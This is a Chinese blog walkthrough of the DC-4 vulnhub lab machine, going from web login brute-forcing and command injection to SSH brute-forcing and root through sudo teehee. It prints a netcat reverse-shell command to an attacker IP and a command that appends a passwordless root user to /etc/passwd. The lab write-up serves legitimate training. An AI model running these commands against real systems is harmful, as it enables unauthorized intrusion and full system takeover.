vulhub系列之DC4靶场详解

文章目录

环境

  1. vulhub系列之DC4靶场
  2. VMware虚拟机
  3. kali

爆破网站管理员用户拿shell

vulhub系列之DC4靶场详解

由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。

vulhub系列之DC4靶场详解

根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。

vulhub系列之DC4靶场详解

vulhub系列之DC4靶场详解

爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。

vulhub系列之DC4靶场详解

vulhub系列之DC4靶场详解

反弹shell成功,是用nc反弹成功的,bash我没有反弹成功,不知道是哪里出问题了。反弹shell命令为:

nc -e /bin/bash 192.168.43.173 12345

并且在得到的shll用python -c 'import pty;pty.spawn("/bin/bash")'反弹一个完整shll。接下来就是一顿文件查看。看看有没有什么可以利用的信息。

SSH爆破密码

vulhub系列之DC4靶场详解

最终在/home/jim/backups目录下找到了一份密码文件,所以直接用这份密码文件ssh爆破jim。

vulhub系列之DC4靶场详解

爆破成功,jim/jibril04直接ssh连接。

vulhub系列之DC4靶场详解

查看mbox,可以看出这是一个邮箱信息,所以查看邮箱内容(邮箱默认路径为/var/mail)

vulhub系列之DC4靶场详解

邮箱内容是charles发的,并且告诉了密码,所以直接su切换charles。

vulhub系列之DC4靶场详解

teehee提权

进入charles,查看是否有什么提示信息。没发现可以用的信息。所以看看有不有可以提权的利用点,输入命令sudo -l后发现teehee不需要命令就可以执行root权限。于是查看teehee的帮助信息。

vulhub系列之DC4靶场详解

发现teehee的-a参数可以在文件后面加入内容,所以想到可以在/etc/passwd文件加入具有root权限的自定义用户名,并且可以不设置密码。所以根据/etc/passwd文件下的内容格式自定义用户。
/etc/passwd文件下的用户格式为:
用户名:密码占位符:用户id:组id:备注信息:家目录:命令执行环境
当密码占位符为空时,用户没有密码。

执行命令:

echo 'admin::0:0::/home/admin:/bin/bash' |sudo teehee -a /etc/passwd

vulhub系列之DC4靶场详解

直接切换自定义用户,提权成功。

vulhub系列之DC4靶场详解

加入/root下拿到flag.

上一篇:(11.18)


下一篇:vulnhub-FirstBlood